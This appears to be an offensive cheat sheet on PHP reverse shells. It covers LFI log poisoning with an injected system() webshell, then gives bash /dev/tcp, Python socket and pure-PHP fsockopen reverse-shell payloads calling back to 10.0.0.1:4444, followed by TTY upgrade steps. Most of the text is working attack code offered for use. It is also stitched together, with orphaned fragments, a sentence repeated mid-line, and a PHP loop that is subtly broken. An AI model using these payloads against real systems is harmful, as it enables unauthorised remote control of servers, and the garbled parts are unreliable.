If LFI exists, an attacker may use php://filter or upload a log file containing PHP code:
http://target.com/page.php?file=../../../../var/log/apache2/access.log
Then poison the log with <?php system($_GET['cmd']); ?> via User-Agent header.
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
proc_open('cmd.exe', $descriptorspec, $pipes);
Simple (nc-like):
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>
Python-based (if bash unavailable):
<?php system("python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"); ?>
No system() – pure PHP socket:
<?php $s=fsockopen("10.0.0.1",4444); while(!feof($s)) $c=fread($s,1024); $o=shell_exec($c); fwrite($s,$o); ?>
The basic concept involves:
So you caught your PHP reverse shell. It’s ugly. It doesn't have tab completion, text editors like nano won't work, and you can't use su. You have a "dumb" shell. reverse shell php top
The Python Upgrade Trick: Most Linux servers have Python installed. Run this command immediately after catching the shell to get a fully interactive TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Then, press Ctrl+Z to background the shell. On your local machine, type: If LFI exists, an attacker may use php://filter
stty raw -echo
fg
Finally, type export TERM=xterm. You now have a fully functional shell with arrow keys, tab completion, and text editors.